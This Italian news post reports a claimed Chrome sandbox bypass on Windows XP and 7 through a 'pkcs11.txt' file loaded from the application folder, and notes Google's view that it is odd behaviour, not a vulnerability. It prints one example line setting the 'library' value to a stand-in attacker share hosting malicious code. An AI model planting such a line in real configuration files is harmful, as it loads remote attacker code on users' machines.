Corsi on-line

Importante vulnerabilità in Chrome, o no?

Fino ad ora Google Chrome veniva considerato un browser estremamente sicuro grazie al suo meccanismo di Sandbox, ora però la crew di ACROS Security, un’azienda specializzata nella produzione di soluzioni per la sicurezza dei sistemi informatici, avrebbe identificato una vulnerabilità a carico del programma di navigazione grazie alla quale un utente malintenzionato potrebbe eseguire codice da remoto bypassando la Sandbox.

La falla, almeno per ora, costituirebbe un pericolo soltanto per alcune piattaforme della Microsoft, Windows XP (SP3) e Windows Seven (SP1), nello specifico la minaccia potrebbe essere sfruttata da utenti con bassi privilegi in grado di inserire codici melevoli in file che potrebbero essere eseguiti dando luogo ad intrusioni; Chrome infatti, carica un file chiamato “pkcs11.txt” dalla cartella dell’applicazione, quando il file è rilevato viene eseguito.

In “pkcs11.txt” è presente un valore, denominato “library” che, se alterato, può richiamare codice malevoli archiviato in remoto, rendendo praticamente inservibile la Sandbox. Ecco un semplice esempio di manipolazione di questo valore:

library=\\www.sito-attaccante.it\cartella\codice_malevolo.lib

Mountain View avrebbe definito questa problematica non una vera e propria vulnerabilità, ma uno strano comportamento da parte del browser. Per maggiori dettagli potete consultare questo articolo di approfondimento.

 

Post correlati
I più letti del mese
Tematiche